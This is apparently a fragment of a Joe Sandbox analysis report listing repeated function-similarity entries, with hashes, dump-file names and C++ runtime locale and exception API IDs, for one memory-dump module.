                                                                                                                                                                            • Instruction Fuzzy Hash: D63186E9A0CA4281EB29DF36D4500BB6361FB54BA0F582231DA5D677E5DF2CE452CF00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: 4a1d74a696e101f9418e4c1aea131a48374db2b4b2725ffa4bef69a5475c1a62
                                                                                                                                                                            • Instruction ID: 5abe19728cc0d5da439fd0afa313ef8004b8a5b11737974ff65708f5c5b7c674
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a1d74a696e101f9418e4c1aea131a48374db2b4b2725ffa4bef69a5475c1a62
                                                                                                                                                                            • Instruction Fuzzy Hash: 843166B9A08A0282FB15DF75E4900BB6360EB94BA0F586731E79D777E5DE2CE4518B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: f3470c7af5e1219ea517dc311023a40c6ff5171f338326e24b56031dd2e8a965
                                                                                                                                                                            • Instruction ID: ea415248942c1dda6372670430e817b8a9197987d9af0c63138739b3fae0d028
                                                                                                                                                                            • Opcode Fuzzy Hash: f3470c7af5e1219ea517dc311023a40c6ff5171f338326e24b56031dd2e8a965
                                                                                                                                                                            • Instruction Fuzzy Hash: BD3193AAA08A0682EB14DF35E5500BB6360FB94BA4F186231DA5D777E5DF2CF4418B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            • Opcode ID: 8a0be3e0796e4bd00e343c49d07b79d543f220f19bcd707963a39a8b0941f0ab
                                                                                                                                                                            • Instruction ID: d7f3ea082f7bca7828bcb2e1e5d43e9728c89c03030a74a087ffb18ab9337e90
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a0be3e0796e4bd00e343c49d07b79d543f220f19bcd707963a39a8b0941f0ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D3197B9A09A02C2EB14DF36D59007B6360EF547A0F586231EBAD737E5DE2CE4518B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: 6165060885fdf55755c7bfe429cfe0ecb5ffa73f15c25983cf5194c565986d20
                                                                                                                                                                            • Instruction ID: 6937dd7e3b76323edab96ea38e3bf766fc171bc3a851879ce7f3cd1076f9cca3
                                                                                                                                                                            • Opcode Fuzzy Hash: 6165060885fdf55755c7bfe429cfe0ecb5ffa73f15c25983cf5194c565986d20
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E3165A9A09A0682EB15DF35E4500BB6360EB947A4F586232EA9D377E5DE3CE4518F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: e86ab5f9cdefc02573e43571f9a92ddb28c7e6d3480c0a0ddba73d764e6f00cc
                                                                                                                                                                            • Instruction ID: 0bcc016283a5c3d9ca3de29372f20991a3d236e28cc52899945e1063c64bfcd8
                                                                                                                                                                            • Opcode Fuzzy Hash: e86ab5f9cdefc02573e43571f9a92ddb28c7e6d3480c0a0ddba73d764e6f00cc
                                                                                                                                                                            • Instruction Fuzzy Hash: BB31C6AAA08A0282FB14DF35E4500BB2761EB94BA0F186232D69D377E5DF3CF441CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 448217422-0
                                                                                                                                                                            • Opcode ID: c696fc2c3a6b5382072ca97f56a1b127eb086680fd410d12b52d6abaed43ced8
                                                                                                                                                                            • Instruction ID: 2e5db3dba1775b6b3b5752d0ce93115b57afc3da5198c463773b0e5a683b7e46
                                                                                                                                                                            • Opcode Fuzzy Hash: c696fc2c3a6b5382072ca97f56a1b127eb086680fd410d12b52d6abaed43ced8
                                                                                                                                                                            • Instruction Fuzzy Hash: CA3153A9A08A0282EB159F35E4500BB6360FFA4BA0F586231D69D777E5DE2CE451CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: ce70adfcc3457c4c5b5756c4f99c44a9a6aa3f404df6a0a8152ffd43bb752157
                                                                                                                                                                            • Instruction ID: 729c3e94883fc4af20a5155c8ca5021a24e538efe2ee83967c24fea0651c388e
                                                                                                                                                                            • Opcode Fuzzy Hash: ce70adfcc3457c4c5b5756c4f99c44a9a6aa3f404df6a0a8152ffd43bb752157
                                                                                                                                                                            • Instruction Fuzzy Hash: 583155EAA0CA0281EB19DF36E5900BB6361EB547A0F582231D65D277E5DF2CE455CF00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 1c6ec3c157523f750c870b3272d3ff34d44e14e99ad9b27563f0911ed95044f1
                                                                                                                                                                            • Instruction ID: f1d83af7c610911682f852d3f82ced7ea4b6369551d0a207263ce5f314d9eef2
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c6ec3c157523f750c870b3272d3ff34d44e14e99ad9b27563f0911ed95044f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 353185B9A08A0282FB159F35D4500BB6361FF94BA0F186232E65D777E5DF2CE441CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 0d78e737d81f217a5e139d1ad9bd1c52e5eafd2eeb45db34d52a84de9a5e6e57
                                                                                                                                                                            • Instruction ID: 86467b0f8aa20104e1b8c25422b1829ad14379f01905e9c396d13a1b4002d2ee
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d78e737d81f217a5e139d1ad9bd1c52e5eafd2eeb45db34d52a84de9a5e6e57
                                                                                                                                                                            • Instruction Fuzzy Hash: DB3197E9A08A4681EB15DF36E4500BB6361FFA87A4F186231D69D277E5DF3CE442CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 507ce1a5e7d73154d3749011fcb4afab418e422a1bb32dfaea8c72d98d932c39
                                                                                                                                                                            • Instruction ID: 63ba07e77e9312f8f82c891f8c645ed3c1fe72c5307e922a80c134f3d182068d
                                                                                                                                                                            • Opcode Fuzzy Hash: 507ce1a5e7d73154d3749011fcb4afab418e422a1bb32dfaea8c72d98d932c39
                                                                                                                                                                            • Instruction Fuzzy Hash: 603186A9A09B4282EB15DF35E4600BB6360FB94BE0F586231E75D777E5DF2CE4428B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                                                                                            • Instruction ID: 1e76df7da63dbeae3fc3b5b550a74a73f1a932e9d44ff3563b6e3b1dd16d75bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                                                                                            • Instruction Fuzzy Hash: C73182B9A08E4282FB14DF35E4500BA6360FF547A0F186231E69D337E5DF2CE4518B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                                                                                            • Instruction ID: 9376e63b2d015321e9cd526653e02568e56d9513cc937937a1276964798e7033
                                                                                                                                                                            • Opcode Fuzzy Hash: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                                                                                            • Instruction Fuzzy Hash: F83183ADA09A4282EB15DF36E4500BB6360FB94BA4F586231D7AD777E5DF2CE441CB00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3756862740-0
                                                                                                                                                                            • Opcode ID: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                                                                                            • Instruction ID: 113de373ce0ef61cff7a4f614293cd9fff8e82ea2741436cfffa0d1f4036aec4
                                                                                                                                                                            • Opcode Fuzzy Hash: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                                                                                            • Instruction Fuzzy Hash: EA3192B9A09E0282EB15DF35E4500BA6360EB947A0F586231EA9D337E5DF3CE451DB00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3756862740-0
                                                                                                                                                                            • Opcode ID: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                                                                                            • Instruction ID: 7b8d9311ee4df54105308a8f7a1eaf2430bee1329259af31660315778d9ee603
                                                                                                                                                                            • Opcode Fuzzy Hash: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                                                                                            • Instruction Fuzzy Hash: 883185AAA08A4292EB15DF35D4500BB6360FB94BA0F586231E69D777E5DF3CF4458B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
